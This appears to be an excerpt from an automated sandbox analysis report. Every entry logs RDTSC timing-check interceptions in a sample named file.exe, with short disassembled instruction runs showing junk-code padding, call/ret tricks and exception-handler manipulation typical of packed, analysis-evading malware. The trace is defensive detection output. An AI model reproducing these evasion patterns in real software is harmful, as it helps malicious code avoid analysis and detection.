        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DDD3 second address: D7DE50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F590909A3E8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D27AAh], ebx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F590909A3E8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 jmp 00007F590909A3EDh 0x0000004d push 00000000h 0x0000004f sub dword ptr [ebp+124770E3h], edx 0x00000055 mov dword ptr [ebp+122D3362h], edx 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 pop edi 0x00000061 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DE50 second address: D7DE71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5908B64E78h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E70A second address: D7E714 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F828 second address: D7F8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jp 00007F5908B64E66h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jmp 00007F5908B64E6Dh 0x00000016 pop eax 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F5908B64E68h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov edi, dword ptr [ebp+12452E8Dh] 0x00000039 push 00000000h 0x0000003b jnp 00007F5908B64E6Ch 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007F5908B64E68h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d jnp 00007F5908B64E6Ch 0x00000063 mov esi, dword ptr [ebp+122D38B3h] 0x00000069 push eax 0x0000006a pushad 0x0000006b push esi 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EFDA second address: D7F006 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jo 00007F590909A3E6h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 jbe 00007F590909A402h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F590909A3F0h 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F006 second address: D7F00A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80347 second address: D8036E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F590909A3ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F590909A3F4h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8036E second address: D80374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80374 second address: D80378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80378 second address: D8037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81866 second address: D818EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F590909A3E8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007F590909A3E8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e mov di, F65Ch 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007F590909A3E8h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e xchg eax, ebx 0x0000005f push edi 0x00000060 js 00007F590909A3ECh 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8162E second address: D81632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82E2B second address: D82E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F590909A3F7h 0x00000009 popad 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82E47 second address: D82E4C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D858F1 second address: D858F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D858F5 second address: D8590A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8590A second address: D8590F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8590F second address: D85915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84A2F second address: D84A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84A33 second address: D84A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86C2F second address: D86C4E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F590909A3F0h 0x00000013 pop edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88AF0 second address: D88B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F5908B64E68h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 je 00007F5908B64E69h 0x0000002c mov bx, dx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F5908B64E68h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov edi, dword ptr [ebp+122D37B3h] 0x00000051 push 00000000h 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F5908B64E68h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 0000001Ah 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d xchg eax, esi 0x0000006e pushad 0x0000006f jl 00007F5908B64E6Ch 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87C4D second address: D87C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F590909A3F3h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88B90 second address: D88BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F5908B64E72h 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d jc 00007F5908B64E70h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87D42 second address: D87D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88CF1 second address: D88CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AA0E second address: D8AA39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F590909A3F5h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B9B7 second address: D8B9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F5908B64E66h 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AB8C second address: D8AC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F590909A3E8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov ebx, dword ptr [ebp+122D3897h] 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov ebx, edx 0x0000003b mov eax, dword ptr [ebp+122D05FDh] 0x00000041 movsx edi, bx 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F590909A3E8h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000018h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F590909A3EBh 0x00000068 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BADC second address: D8BAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BAE2 second address: D8BB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 mov bh, dh 0x00000009 push dword ptr fs:[00000000h] 0x00000010 pushad 0x00000011 mov dword ptr [ebp+122D2368h], esi 0x00000017 mov dx, 19B6h 0x0000001b popad 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F590909A3E8h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d jns 00007F590909A3E6h 0x00000043 mov eax, dword ptr [ebp+122D1209h] 0x00000049 mov bx, F4D1h 0x0000004d or dword ptr [ebp+122D28EDh], ebx 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F590909A3E8h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f stc 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F590909A3ECh 0x00000078 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D880 second address: D8D88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F5908B64E66h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8E8D2 second address: D8E8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8E8D6 second address: D8E8E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8DBDF second address: D8DBE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB1B second address: D8CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F9C4 second address: D8F9DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F590909A3E8h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D908E9 second address: D908EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D908EF second address: D90980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F590909A3EDh 0x0000000e nop 0x0000000f mov edi, esi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 sub dword ptr [ebp+122D2AB1h], edi 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F590909A3E8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov edi, ecx 0x00000041 mov eax, dword ptr [ebp+122D154Dh] 0x00000047 adc edi, 0D78D023h 0x0000004d mov ebx, dword ptr [ebp+122D36ABh] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push esi 0x00000058 call 00007F590909A3E8h 0x0000005d pop esi 0x0000005e mov dword ptr [esp+04h], esi 0x00000062 add dword ptr [esp+04h], 00000018h 0x0000006a inc esi 0x0000006b push esi 0x0000006c ret 0x0000006d pop esi 0x0000006e ret 0x0000006f mov dword ptr [ebp+122D2066h], edi 0x00000075 push eax 0x00000076 jo 00007F590909A3F8h 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90980 second address: D90984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90984 second address: D90988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9276E second address: D92774 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92774 second address: D92779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9285B second address: D92864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D937C5 second address: D937CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CAA7 second address: D9CAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CAAB second address: D9CAB9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CAB9 second address: D9CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6999 second address: DA699F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA717B second address: DA7181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7181 second address: DA7185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7185 second address: DA71A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5908B64E77h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7305 second address: DA7309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7309 second address: DA730F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA730F second address: DA7331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ebx 0x00000008 push esi 0x00000009 jmp 00007F590909A3F1h 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7709 second address: DA770D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA770D second address: DA771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F590909A3E8h 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA78A5 second address: DA78AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A07 second address: DA7A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A11 second address: DA7A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B2AF second address: D7B2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F590909A3F3h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B2C6 second address: D7B309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e lea eax, dword ptr [ebp+12482048h] 0x00000014 mov edi, dword ptr [ebp+122D3887h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F5908B64E70h 0x00000023 jc 00007F5908B64E66h 0x00000029 popad 0x0000002a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B309 second address: D7B30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B30F second address: D61B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F5908B64E68h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, ebx 0x0000002a call dword ptr [ebp+12466CFAh] 0x00000030 push ebx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B4DF second address: D7B4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B6CE second address: D7B6D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B6D3 second address: D7B6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B798 second address: D7B79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BC6D second address: D7BC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F590909A3F2h 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C295 second address: D7C2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C2A4 second address: D7C2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C2AB second address: D7C2CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5908B64E71h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C2CA second address: D7C2CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C41B second address: D7C41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C41F second address: D626C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, edi 0x0000000c call dword ptr [ebp+122D1B90h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F590909A3F6h 0x00000019 push eax 0x0000001a jmp 00007F590909A3F1h 0x0000001f pop eax 0x00000020 rdtsc
